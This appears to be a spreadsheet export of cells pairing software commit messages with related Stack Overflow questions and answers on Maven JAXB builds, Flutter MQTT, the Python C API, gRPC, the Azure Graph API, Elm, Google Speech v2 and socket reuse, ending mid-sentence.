This XSLT should be run after the code for c.xsd, but before the code for a.xsd and b.xsd is generated. This can be achieved by putting these executions into different phases (generate-sources, process-sources, generate-resources).
Below is the complete pom.xml:
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;project xmlns="http://maven.apache.org/POM/4.0.0"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"&gt;
	&lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;
	&lt;groupId&gt;org.jvnet.jaxb2.maven2&lt;/groupId&gt;
	&lt;artifactId&gt;divide&lt;/artifactId&gt;
	&lt;version&gt;0.0.1-SNAPSHOT&lt;/version&gt;
	&lt;dependencies&gt;
		&lt;dependency&gt;
			&lt;groupId&gt;org.glassfish.jaxb&lt;/groupId&gt;
			&lt;artifactId&gt;jaxb-runtime&lt;/artifactId&gt;
			&lt;version&gt;2.2.11&lt;/version&gt;
		&lt;/dependency&gt;
		&lt;!-- JUnit --&gt;
		&lt;dependency&gt;
			&lt;groupId&gt;junit&lt;/groupId&gt;
			&lt;artifactId&gt;junit&lt;/artifactId&gt;
			&lt;scope&gt;test&lt;/scope&gt;
			&lt;version&gt;4.12&lt;/version&gt;
		&lt;/dependency&gt;
	&lt;/dependencies&gt;
	&lt;build&gt;
		&lt;plugins&gt;
			&lt;plugin&gt;
				&lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;
				&lt;artifactId&gt;xml-maven-plugin&lt;/artifactId&gt;
				&lt;version&gt;1.0.2&lt;/version&gt;
				&lt;executions&gt;
					&lt;execution&gt;
						&lt;goals&gt;
							&lt;goal&gt;transform&lt;/goal&gt;
						&lt;/goals&gt;
						&lt;phase&gt;process-sources&lt;/phase&gt;
					&lt;/execution&gt;
				&lt;/executions&gt;
				&lt;configuration&gt;
					&lt;transformationSets&gt;
						&lt;transformationSet&gt;
							&lt;dir&gt;${project.build.directory}/xjc-c/META-INF&lt;/dir&gt;
							&lt;outputDir&gt;${project.build.directory}/xjc-c/META-INF&lt;/outputDir&gt;
							&lt;includes&gt;
								&lt;include&gt;sun-jaxb.episode&lt;/include&gt;
							&lt;/includes&gt;
							&lt;stylesheet&gt;src/main/xslt/removeJaxbSchemaBindings.xslt&lt;/stylesheet&gt;
						&lt;/transformationSet&gt;
					&lt;/transformationSets&gt;
				&lt;/configuration&gt;
			&lt;/plugin&gt;
			&lt;plugin&gt;
				&lt;groupId&gt;org.jvnet.jaxb2.maven2&lt;/groupId&gt;
				&lt;artifactId&gt;maven-jaxb2-plugin&lt;/artifactId&gt;
				&lt;version&gt;0.13.3&lt;/version&gt;
				&lt;executions&gt;
					&lt;execution&gt;
						&lt;id&gt;xjc-c&lt;/id&gt;
						&lt;goals&gt;
							&lt;goal&gt;generate&lt;/goal&gt;
						&lt;/goals&gt;
						&lt;phase&gt;generate-sources&lt;/phase&gt;
						&lt;configuration&gt;
							&lt;generatePackage&gt;test.c&lt;/generatePackage&gt;
							&lt;generateDirectory&gt;${project.build.directory}/xjc-c&lt;/generateDirectory&gt;
							&lt;schemaIncludes&gt;
								&lt;includes&gt;c.xsd&lt;/includes&gt;
							&lt;/schemaIncludes&gt;
						&lt;/configuration&gt;
					&lt;/execution&gt;
					&lt;execution&gt;
						&lt;id&gt;xjc-a&lt;/id&gt;
						&lt;goals&gt;
							&lt;goal&gt;generate&lt;/goal&gt;
						&lt;/goals&gt;
						&lt;phase&gt;generate-resources&lt;/phase&gt;
						&lt;configuration&gt;
							&lt;generatePackage&gt;test.a&lt;/generatePackage&gt;
							&lt;generateDirectory&gt;${project.build.directory}/xjc-a&lt;/generateDirectory&gt;
							&lt;schemaIncludes&gt;
								&lt;includes&gt;a.xsd&lt;/includes&gt;
							&lt;/schemaIncludes&gt;
							&lt;bindings&gt;
								&lt;binding&gt;
									&lt;fileset&gt;
										&lt;directory&gt;${project.build.directory}/xjc-c/META-INF&lt;/directory&gt;
										&lt;includes&gt;
											&lt;include&gt;sun-jaxb.episode&lt;/include&gt;
										&lt;/includes&gt;
									&lt;/fileset&gt;
								&lt;/binding&gt;
							&lt;/bindings&gt;
						&lt;/configuration&gt;
					&lt;/execution&gt;
					&lt;execution&gt;
						&lt;id&gt;xjc-b&lt;/id&gt;
						&lt;goals&gt;
							&lt;goal&gt;generate&lt;/goal&gt;
						&lt;/goals&gt;
						&lt;phase&gt;generate-resources&lt;/phase&gt;
						&lt;configuration&gt;
							&lt;generatePackage&gt;test.b&lt;/generatePackage&gt;
							&lt;generateDirectory&gt;${project.build.directory}/xjc-b&lt;/generateDirectory&gt;
							&lt;schemaIncludes&gt;
								&lt;includes&gt;b.xsd&lt;/includes&gt;
							&lt;/schemaIncludes&gt;
							&lt;bindings&gt;
								&lt;binding&gt;
									&lt;fileset&gt;
										&lt;directory&gt;${project.build.directory}/xjc-c/META-INF&lt;/directory&gt;
										&lt;includes&gt;
											&lt;include&gt;sun-jaxb.episode&lt;/include&gt;
										&lt;/includes&gt;
									&lt;/fileset&gt;
								&lt;/binding&gt;
							&lt;/bindings&gt;
						&lt;/configuration&gt;
					&lt;/execution&gt;
				&lt;/executions&gt;
			&lt;/plugin&gt;
		&lt;/plugins&gt;
	&lt;/build&gt;
&lt;/project&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;class MyApp extends StatelessWidget {
  const MyApp({super.key});
  @override
  Widget build(BuildContext context) {
    return ChangeNotifierProvider(
      create: (context) =&amp;gt; MyAppState(),
      child: MaterialApp(
        title: 'Namer App',
        home: MyHomePage(),
        color: Colors.white,
      ),
    );
  }
}
class MyAppState extends ChangeNotifier {
  var current = WordPair.random();
  void getNext() {
    current = WordPair.random();
    notifyListeners();
  }
  var favorites = &amp;lt;WordPair&amp;gt;[];
  void toggleFavorite() {
    if (favorites.contains(current)) {
      favorites.remove(current);
    } else {
      favorites.add(current);
    }
    notifyListeners();
  }
}
class MyHomePage extends StatefulWidget {
  @override
  State&amp;lt;MyHomePage&amp;gt; createState() =&amp;gt; _MyHomePageState();
}
class _MyHomePageState extends State&amp;lt;MyHomePage&amp;gt; {
  int selectedIndex = 0; // BottomNavigationBarì˜ index
  static List&amp;lt;NavigationItem&amp;gt; _navigationItems = [
    NavigationItem(label: 'Home', icon: Icons.home, page: GeneratorPage()),
    NavigationItem(label: 'Setting', icon: Icons.settings, page: FavoritesPage()),
  ];
  Future&amp;lt;void&amp;gt; setupMqtt() async {
    if(client!=null &amp;amp;&amp;amp; client!.onConnected==true)
      return;
    // MQTT ë¸Œë¡œì»¤ ì—°ê²°
    client = MqttServerClient.withPort(broker, 'flutter_client', port);
    client!.secure = true;
    // MQTT ë¡œê·¸ ì¶œë ¥
    client!.logging(on: false);
    client!.securityContext = SecurityContext()
      ..usePrivateKey('assets/mqtt_client.key')
      ..useCertificateChain('assets/mqtt_client.pem')
      ..setTrustedCertificates('assets/mqtt_ca.pem');
    client!.setProtocolV311();
    client!.autoReconnect = true;
    client!.pongCallback = pong;
    // ë¦¬ìŠ¤ë„ˆ ë“±ë¡
    client!.onConnected = onMqttConnected;
    client!.onDisconnected = onMqttDisconnected;
    client!.onSubscribed = onSubscribed;
    try {
      //
      await client!.connect();
      print('cntcccnt\n');
    } catch (e) {
      print('Connected Failed.. \nException: $e');
    }
  }
//mqtt
  void onMqttConnected() {
    print(':: MqttConnected');
    setState(() {
      connected = true;
      // MQTT ì—°ê²° ì‹œ í† í”½ êµ¬ë….
      client!.subscribe(topic, MqttQos.atLeastOnce);
      // í† í”½ ìˆ˜ì‹  ë¦¬ìŠ¤ë„ˆ
      client!.updates!.listen((List&amp;lt;MqttReceivedMessage&amp;lt;MqttMessage&amp;gt;&amp;gt; c) {
        final MqttPublishMessage recMess = c[0].payload as MqttPublishMessage;
        final String pt = c[0].topic;
        final String message = MqttPublishPayload.bytesToStringAsString(recMess.payload.message);
        String topic = pt;
        print('Received message: topic=$pt');
        List&amp;lt;String&amp;gt; splitTopic = topic.split('/');
        // print(splitTopic[0] + &amp;quot;\n&amp;quot;);
        // print(splitTopic[1] + &amp;quot;\n&amp;quot;);
        // print(splitTopic[2] + &amp;quot;\n&amp;quot;);
        // print(splitTopic[3] + &amp;quot;\n&amp;quot;);
        // ìˆ˜ì‹ í•œ ë©”ì‹œì§€ ì²˜ë¦¬
        if (splitTopic[0].compareTo('v1') == 0) {
          setState(() {
            entries.add(splitTopic[2]); // ë³µì‚¬ëœ ë¦¬ìŠ¤íŠ¸ì— ì¶”ê°€
          });
        }
      });
    });
  }
  void onMqttDisconnected() {
    print(':: MqttDisconnected');
    setState(() {
      connected = false;
    });
  }
  void onSubscribed(String topic) {
    print(':: Subscribed topic: $topic');
  }
  void pong() {
    print('Ping response received');
  }
  @override
  Widget build(BuildContext context) {
    return LayoutBuilder(
      builder: (context, Constraints) {
        return Scaffold(
          backgroundColor: Colors.white,
          appBar: AppBar(
            centerTitle: true,
            title: Text('test', style: TextStyle(fontWeight: FontWeight.bold, color: Color.fromARGB(255, 101, 152, 255))),
            backgroundColor: Colors.black,
            actions: [
              IconButton(
                icon: Icon(Icons.connect_without_contact),
                onPressed: () {
                  setupMqtt();
                },
              ),
            ]),
          body: Row(
            children: [
              Visibility(
              visible: Constraints.maxWidth&amp;gt;700? true:false,
              child: SafeArea(
                child: NavigationRail(
                  selectedIndex: selectedIndex,
                  onDestinationSelected: (int index) {
                    setState(() {
                      selectedIndex = index;
                    });
                  },
                  labelType: NavigationRailLabelType.all, // ëª¨ë“  ë¼ë²¨ í‘œì‹œ (ì„ íƒì )
                  destinations: _navigationItems
                      .map(
                        (item) =&amp;gt; NavigationRailDestination(
                          icon: Icon(item.icon),
                          selectedIcon: Icon(item.icon,
                              color: Colors.white), // ì„ íƒëœ ì•„ì´ì½˜ ìƒ‰ìƒ ë³€ê²½ (ì„ íƒì )
                          label: Text(item.label),
                        ),
                      )
                      .toList(),
                  backgroundColor: Colors.black, // ë°°ê²½ìƒ‰
                  selectedIconTheme: const IconThemeData(
                      color: Colors.white), // ì„ íƒëœ ì•„ì´ì½˜ í…Œë§ˆ (ì„ íƒì )
                  unselectedIconTheme: const IconThemeData(
                      color: Colors.grey), // ì„ íƒë˜ì§€ ì•Šì€ ì•„ì´ì½˜ í…Œë§ˆ (ì„ íƒì )
                  unselectedLabelTextStyle: TextStyle(
                    color: Colors.grey, // í°ìƒ‰
                  ),
                  selectedLabelTextStyle: TextStyle(
                    color: Colors.white, // í°ìƒ‰
                  ),
                  // extended: true, // í•„ìš”í•˜ë‹¤ë©´ í™•ìž¥ëœ ë„¤ë¹„ê²Œì´ì…˜ ë ˆì¼ ì‚¬ìš© (ì„ íƒì )
                ),
              ),
            ),
              Expanded(
                child: Container(
                  color: Colors.white,
                  child: _navigationItems[selectedIndex].page, // â† Here.
                ),
              ),
            ],
          ),
          bottomNavigationBar: Visibility(
            visible: Constraints.maxWidth&amp;lt;=700? true:false,
            child: BottomNavigationBar( // BottomNavigationBar ì¶”ê°€
              items: _navigationItems.map((item) =&amp;gt; BottomNavigationBarItem(
                icon: Icon(item.icon),
                label: item.label,
              )).toList(),
              currentIndex: selectedIndex,
              onTap: (index) {
                setState(() {
                  selectedIndex = index;
                });
              },
              selectedItemColor: Colors.white, // ì„ íƒëœ ì•„ì´í…œ ìƒ‰ìƒ ë³€ê²½
              unselectedItemColor: Colors.grey, // ì„ íƒë˜ì§€ ì•Šì€ ì•„ì´í…œ ìƒ‰ìƒ ë³€ê²½
              backgroundColor: Colors.black, // ë°°ê²½ìƒ‰ìƒ ë³€ê²½
            ),
          ),
        );
      }
    );
  }
}
class NavigationItem {
  final String label;
  final IconData icon;
  final Widget page;
  const NavigationItem({required this.label, required this.icon, required this.page});
}
List&amp;lt;String&amp;gt; entries = &amp;lt;String&amp;gt;[];
class GeneratorPage extends StatefulWidget {
  @override
  State&amp;lt;GeneratorPage&amp;gt; createState() =&amp;gt; _GeneratorPageState();
}
class _GeneratorPageState extends State&amp;lt;GeneratorPage&amp;gt; {
  @override
  Widget build(BuildContext context) {
    return Center(
      child: Padding(
        padding: const EdgeInsets.all(8.0),
        child: ListView.separated(
          padding: const EdgeInsets.all(8),
          itemCount: entries.length,
          itemBuilder: (BuildContext context, int index) {
            return ListTile(
                title: Text(entries[index]),
                onTap: () {
                  //setupMqtt();
                  // ì•„ì´í…œ í´ë¦­ ì‹œ ìƒˆë¡œìš´ í™”ë©´ìœ¼ë¡œ ì´ë™
                  Navigator.push(
                    context,
                    MaterialPageRoute(
                      builder: (context) =&amp;gt; DetailScreen(item: entries[index]),
                    ),
                  );
                },
              );
          },
          separatorBuilder: (BuildContext context, int index) =&amp;gt; const Divider(),
        ),
      ),
    );
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to update the screen every time I add data to the entries by receiving data from a listView with entries as children using mqtt, but it doesn't work as I want.&lt;/p&gt;
&lt;p&gt;Where is the problem?&lt;/p&gt;
&lt;p&gt;I would really appreciate it if you could let me know.&lt;/p&gt;
&lt;p&gt;Also, I'm not good at English, so I'd appreciate it if you could leave a comment about anything you don't understand.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C788</t>
  </si>
  <si>
    <t>lib/smbconf: add a python function for raising smbconf exceptions
The previous implementation in C was private to the module. Add
a small python wrapper function so that a different python module
may reuse the implementation.
The python level function is prefixed with "_" to mark it as
"private". Only future cooperating modules in the samba sources
should make use of it.
The function is shared at the python level as per the recommendation:
    https://stackoverflow.com/a/2136670
Signed-off-by: John Mulligan &lt;jmulligan@redhat.com&gt;
Reviewed-by: Jeremy Allison &lt;jra@samba.org&gt;
Reviewed-by: Douglas Bagnall &lt;douglas.bagnall@catalyst.net.nz&gt;</t>
  </si>
  <si>
    <t>Your problem is that
type-&gt;tp_init
doesn't do what you want.
type-&gt;tp_init
is called after an object is allocated to do the instantiation. You'd first have to allocate the object using
type-&gt;tp_new
, then pass that object as the first argument to
type-&gt;tp_init
. Since you pass an uninitialized pointer to
tp_init
, all bets are off. You typically don't call either function directly, though, and instead call one of
PyObject_Call*()
on the type object itself to create a new instance. Or provide a normal C function to create a new instance, a la
PyFoo_New()
.
That said, the usual way to do intercommunication between two extension modules is to do it through the Python API. If you want module B to import and use module A, you call
PyImport_Import()
to get the module object,
PyObject_GetAttrString()
to get the type object you care about, and one of
PyObject_Call*()
to instantiate it. Any place you want to store a pointer to that type, you would just take a
PyObject *
.</t>
  </si>
  <si>
    <t xml:space="preserve">I get to work with a number of companies, mostly with architects/lead developers and sometimes directly with the developers. One thing that comes up often is that when architects prescribe an application pattern, they want it to be followed consistently every time with little to no room for variation. 
Presentation Model/M-V-VM
A good example of this is the Presentation Model (M-V-VM) pattern. When I think of this pattern, I think of it as "we have an object model to represent the state and behaviors of the current scenario, and a view object that surfaces it to the UI". In my mind, the things representing the state (the model/view model) is more conceptual than a prescriptive guide. A view might use many objects to represent this state, or it might use one, or perhaps it is so simple that it needs none, or perhaps it shares one. The ethos of the pattern is that we seperate the state management from the visualization code. 
However, often what I come across is the patterns being intepreted much more literally. A typical project might look like this:
Views
Foo
FooView.xaml
FooView.xaml.cs
FooViewModel.cs
FooModel.cs
Bar
BarView.xaml
BarView.xaml.cs
BarViewModel.cs
BarModel.cs
Sometimes, the Model object is empty, or the ViewModel is just forwarding property getters/setters to the model object. Sometimes the view is so simple, that the extra objects just make it more complicated than it needs to be.
As architects/team leads, do you prefer developers follow the same process every time like a checklist? Or do you prefer to leave the details up to the developers?
</t>
  </si>
  <si>
    <t>C789</t>
  </si>
  <si>
    <t>In AppendEntries, create a new ClientContext for each attempt
Reusing a ClientContext can cause gRPC to crash
https://stackoverflow.com/questions/61889726/client-grpc-connection-with-reconnect-in-c</t>
  </si>
  <si>
    <t>My problem was attempting to re-use a context. Creating a new context for each attempt fixed the issue.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create an Azure application with both password credentials and key credentials using the Graph API. However, when I attempt to include both credentials in the request body, the API returns a 400 Bad Request error. The error message indicates that the &amp;quot;body should not contain KeyId.&amp;quot;&lt;/p&gt;
&lt;p&gt;Here is the request body I am using when including both credentials:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;displayName&amp;quot;: &amp;quot;abcd&amp;quot;,
  &amp;quot;keyCredentials&amp;quot;: [
    {
      &amp;quot;KeyCredentials info&amp;quot;
    }
  ],
  &amp;quot;passwordCredentials&amp;quot;: [
    {
      &amp;quot;passwordCredentials info&amp;quot;
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The request fails with a 400 error, but when I create the application with only key credentials, the request is successfully processed and returns a 200 status. I can then update the key credentials for the application as expected.&lt;/p&gt;
&lt;p&gt;Hereâ€™s the request body for creating the application with only key credentials:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;displayName&amp;quot;: &amp;quot;abcd&amp;quot;,
  &amp;quot;keyCredentials&amp;quot;: [
    {
      &amp;quot;KeyCredentials info&amp;quot;
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone explain why this happens? Is there a specific reason why the Graph API rejects the request when both key and password credentials are included?&lt;/p&gt;
&lt;p&gt;Response which I got:
&lt;a href="https://i.sstatic.net/DdN5Ypu4.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/DdN5Ypu4.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Endpoint: POST &lt;a href="https://graph.microsoft.com/v1.0/applications/" rel="nofollow noreferrer"&gt;https://graph.microsoft.com/v1.0/applications/&lt;/a&gt;
Sample of the Request Body looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
    &amp;quot;displayname&amp;quot;:&amp;quot;sample&amp;quot;,
    &amp;quot;keyCredentials&amp;quot;: [
        {
            &amp;quot;customKeyIdentifier&amp;quot;: &amp;quot;=&amp;quot;,
            &amp;quot;displayName&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;endDateTime&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;key&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;keyId&amp;quot;: &amp;quot;,
            &amp;quot;startDateTime&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;type&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;usage&amp;quot;: &amp;quot;&amp;quot;
        }
    ],
    &amp;quot;passwordCredentials&amp;quot;: [
        {
            &amp;quot;customKeyIdentifier&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;displayName&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;endDateTime&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;keyId&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;secretText&amp;quot;: &amp;quot;&amp;quot;,
            &amp;quot;startDateTime&amp;quot;: &amp;quot;&amp;quot;
        }
    ]
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C79</t>
  </si>
  <si>
    <t>Extract NodeContent update/view code to NodeContent
This was particularly tricky, because you have to make sure all of the
types line up, particularly in `update` and `view`. Messages that you
generate in child components have to be wrapped in the parent Msg, and
messages generated in parent components have to be wrapped in the child
Msgs. `Svg.map`, `Cmd.map` and `Sub.map` can help with this.
Resources that helped me:
* https://stackoverflow.com/a/38222804</t>
  </si>
  <si>
    <t>Think twice before splitting your modules, premature code splitting might be harmful to your project.
Here is an example of the project structure I use in my Elm apps.
Messages
Html.App.map allows us to tag a message for child component, so we could pass it to Components.Counter.Update.update function, when keyboard subscription emits a message.
module App.View exposing (..)
import Html.App
import Html exposing (text, div, Html)
import App.Model exposing (Model)
import App.Messages exposing (..)
import Components.Counter.View
view : Model -&gt; Html Msg
view model =
    div []
        [ Html.App.map Counter (Components.Counter.View.view model.counter) ]
Subscriptions
To tag a message from a subscription, we have to use Platform.Sub.map
Please see an example of subscription passing in src/App/Subscriptions.elm
module App.Subscriptions exposing (..)
import App.Model exposing (Model)
import App.Messages exposing (..)
import Components.Counter.Subscriptions
subscriptions : Model -&gt; Sub Msg
subscriptions model =
    let
        counterSub =
            Components.Counter.Subscriptions.subscriptions model.counter
    in
        Sub.batch [ Sub.map Counter counterSub ]
File structure
Main.elm                 -- Entry point, where App is initialized
Utils.elm                -- Utilities
App/
    Messages.elm
    Model.elm
    Subscriptions.elm
    Update.elm
    View.elm
Components/
    StatefulComponent/
        Messages.elm
        Model.elm
        Subscriptions.elm
        Update.elm
        View.elm
    StatefulComponentWithCommands/
        Commands.elm     -- Functions, which return Cmd msg
        Messages.elm
        Model.elm
        Subscriptions.elm
        Update.elm
        View.elm
    StatelessComponent/
        View.elm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem when I try to run an application using speech to text v2. I want to convert speech to text using a microphone. I use the GOOGLE_APPLICATION_CREDENTIALS variable and using v1 everything works for me. However, when I migrated to v2 I get the following exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;com.google.api.gax.rpc.InvalidArgumentException: io.grpc.StatusRuntimeException: INVALID_ARGUMENT: Invalid resource field value in the request.
    at com.google.api.gax.rpc.ApiExceptionFactory.createException(ApiExceptionFactory.java:92)
    at com.google.api.gax.grpc.GrpcApiExceptionFactory.create(GrpcApiExceptionFactory.java:98)
    at com.google.api.gax.grpc.GrpcApiExceptionFactory.create(GrpcApiExceptionFactory.java:66)
    at com.google.api.gax.grpc.ExceptionResponseObserver.onErrorImpl(ExceptionResponseObserver.java:82)
    at com.google.api.gax.rpc.StateCheckingResponseObserver.onError(StateCheckingResponseObserver.java:84)
    at com.google.api.gax.grpc.GrpcDirectStreamController$ResponseObserverAdapter.onClose(GrpcDirectStreamController.java:148)
    at io.grpc.PartialForwardingClientCallListener.onClose(PartialForwardingClientCallListener.java:39)
    at io.grpc.ForwardingClientCallListener.onClose(ForwardingClientCallListener.java:23)
    at io.grpc.ForwardingClientCallListener$SimpleForwardingClientCallListener.onClose(ForwardingClientCallListener.java:40)
    at com.google.api.gax.grpc.ChannelPool$ReleasingClientCall$1.onClose(ChannelPool.java:569)
    at io.grpc.internal.DelayedClientCall$DelayedListener$3.run(DelayedClientCall.java:489)
    at io.grpc.internal.DelayedClientCall$DelayedListener.delayOrExecute(DelayedClientCall.java:453)
    at io.grpc.internal.DelayedClientCall$DelayedListener.onClose(DelayedClientCall.java:486)
    at io.grpc.internal.ClientCallImpl.closeObserver(ClientCallImpl.java:564)
    at io.grpc.internal.ClientCallImpl.access$100(ClientCallImpl.java:72)
    at io.grpc.internal.ClientCallImpl$ClientStreamListenerImpl$1StreamClosed.runInternal(ClientCallImpl.java:729)
    at io.grpc.internal.ClientCallImpl$ClientStreamListenerImpl$1StreamClosed.runInContext(ClientCallImpl.java:710)
    at io.grpc.internal.ContextRunnable.run(ContextRunnable.java:37)
    at io.grpc.internal.SerializingExecutor.run(SerializingExecutor.java:133)
    at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
    at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
    at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: io.grpc.StatusRuntimeException: INVALID_ARGUMENT: Invalid resource field value in the request.
    at io.grpc.Status.asRuntimeException(Status.java:532)
    ... 17 more
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
   package com.mycompany.testgoogleversio2;
    import com.google.api.gax.rpc.ClientStream;
   import com.google.api.gax.rpc.ResponseObserver;
   import com.google.api.gax.rpc.StreamController;
import com.google.cloud.speech.v2.ExplicitDecodingConfig;
import com.google.cloud.speech.v2.RecognitionConfig;
import com.google.cloud.speech.v2.SpeechClient;
import com.google.cloud.speech.v2.SpeechRecognitionAlternative;
import com.google.cloud.speech.v2.StreamingRecognitionConfig;
import com.google.cloud.speech.v2.StreamingRecognitionResult;
import com.google.cloud.speech.v2.StreamingRecognizeRequest;
import com.google.cloud.speech.v2.StreamingRecognizeResponse;
import com.google.protobuf.ByteString;
import java.util.ArrayList;
import java.util.List;
import javax.sound.sampled.AudioFormat;
import javax.sound.sampled.AudioSystem;
import javax.sound.sampled.DataLine;
import javax.sound.sampled.TargetDataLine;
/
public class TestGoogleMicrofone {
    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        ResponseObserver&amp;lt;StreamingRecognizeResponse&amp;gt; responseObserver = null;
        try (SpeechClient client = SpeechClient.create()) {
            responseObserver
                    = new ResponseObserver&amp;lt;StreamingRecognizeResponse&amp;gt;() {
                ArrayList&amp;lt;StreamingRecognizeResponse&amp;gt; responses = new ArrayList&amp;lt;&amp;gt;();
                public void onStart(StreamController controller) {
                    System.out.println(&amp;quot;Startuje&amp;quot;);
                }
                public void onResponse(StreamingRecognizeResponse response) {
                    System.out.println(&amp;quot;laduje&amp;quot;);
                    StreamingRecognitionResult result = response.getResultsList().get(0);
                    SpeechRecognitionAlternative alternative = result.getAlternativesList().get(0);
                    System.out.printf(&amp;quot;Transcript : %s\n&amp;quot;, alternative.getTranscript() + &amp;quot;, is final: &amp;quot; + result.getIsFinal());
                    responses.add(response);
                }
                public void onComplete() {
                    for (StreamingRecognizeResponse response : responses) {
                        StreamingRecognitionResult result = response.getResultsList().get(0);
                        SpeechRecognitionAlternative alternative = result.getAlternativesList().get(0);
                        System.out.printf(&amp;quot;Transcript : %s\n&amp;quot;, alternative.getTranscript());
                    }
                }
                public void onError(Throwable t) {
                    t.printStackTrace();
                }
            };
            ClientStream&amp;lt;StreamingRecognizeRequest&amp;gt; clientStream
                    = client.streamingRecognizeCallable().splitCall(responseObserver);
            List&amp;lt;String&amp;gt; allLanguageCodes = new ArrayList();
            allLanguageCodes.add(&amp;quot;pl-PL&amp;quot;);
            RecognitionConfig recognitionConfig
                    = RecognitionConfig.newBuilder().setExplicitDecodingConfig(
                            ExplicitDecodingConfig.newBuilder()
                                    .setEncoding(ExplicitDecodingConfig.AudioEncoding.LINEAR16)
                                    .setSampleRateHertz(16000)
                                    .setAudioChannelCount(1)
                    ).addLanguageCodes(&amp;quot;en-US&amp;quot;).setModel(&amp;quot;chirp&amp;quot;).build();
            //.setLanguageCode(&amp;quot;en-US&amp;quot;)
            StreamingRecognitionConfig streamingRecognitionConfig
                    = StreamingRecognitionConfig.newBuilder().setConfig(recognitionConfig).setConfig(recognitionConfig).build();
            StreamingRecognizeRequest request
                    = StreamingRecognizeRequest.newBuilder()
                            .setStreamingConfig(streamingRecognitionConfig)
                            .build(); // The first request in a streaming call has to be a config
            AudioFormat format = new AudioFormat(16000.0f, 16, 1, true, false);
            TargetDataLine microphone;
            microphone = AudioSystem.getTargetDataLine(format);
            DataLine.Info info = new DataLine.Info(TargetDataLine.class, format);
            microphone = (TargetDataLine) AudioSystem.getLine(info);
            microphone.open(format);
            //ByteArrayOutputStream out = new ByteArrayOutputStream();
            int numBytesRead;
            int CHUNK_SIZE = 3200;
            byte[] data = new byte[microphone.getBufferSize() / 5];
            //byte[] data = new byte[CHUNK_SIZE];
            microphone.start();
            clientStream.send(request);
            // SampleRate:16000Hz, SampleSizeInBits: 16, Number of channels: 1, Signed: true,
            // bigEndian: false
            long startTime = System.currentTimeMillis();
            int bytesRead = 0;
            try {
                System.out.println(&amp;quot;Start speaking&amp;quot;);
                while (true) {
                    System.out.println(&amp;quot;Jestem2&amp;quot;);
                    long estimatedTime = System.currentTimeMillis() - startTime;
                    numBytesRead = microphone.read(data, 0, microphone.getBufferSize() / 5);
                    bytesRead += numBytesRead;
                    if (estimatedTime &amp;gt; 60000) { // 60 seconds
                        System.out.println(&amp;quot;Stop speakingaaa.&amp;quot;);
                        microphone.close();
                        //clientStream.closeSend();
                        break;
                    }
                    request
                            = StreamingRecognizeRequest.newBuilder().setStreamingConfig(streamingRecognitionConfig)
                                    .setAudio(ByteString.copyFrom(data))
                                    .build();
                    System.out.println(request.getRecognizer());
                    clientStream.send(request);
                    //Thread.sleep(100);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        responseObserver.onComplete();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have no idea what I'm doing wrong but in version v1 everything works fine.
Could someone point out what is the source of this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C790</t>
  </si>
  <si>
    <t>tools: disable connection reuse from the monitor
fix occasional "Get .../__monitor__: EOF: Error null" errors
see also: https://stackoverflow.com/a/23963271</t>
  </si>
  <si>
    <t xml:space="preserve">I'm beginning a project with a client to build a web application and I'm a little stuck on which solution to go with.
I've used Joomla for many clients in the past, but this client has specific requests that I KNOW I'm going to have to build myself.  
The problem I'm facing is that I work full time under the .NET spectrum and while I am a novice developer in PHP, and I've been studying Joomla's plug in architecture for about a month now, I am a lot more comfortable building something in ASP.NET than I am in PHP.
My question is, what OS projects are out there that have a similar community following as Joomla/Mambo/Drupal, along with a plug in architecture that is somewhat akin to Joomla as well?
I don't really have the time to build out a full blown CMS system in ASP.NET, but if something already exists that can give me X% (25%, 50%, something) of what Joomla has that will at least get me on the right path.  Joomla just has too many extensions and too much of a community backing for me to pass it up if there's not something comparable in the ASP.NET realm.
</t>
  </si>
  <si>
    <t>C791</t>
  </si>
  <si>
    <t>Sockets in state "TIME_WAIT" are now reused.
Refer to https://stackoverflow.com/questions/5040491/python-socket-doesnt-close-connection-properly</t>
  </si>
  <si>
    <t>You are experiencing the
TIME_WAIT
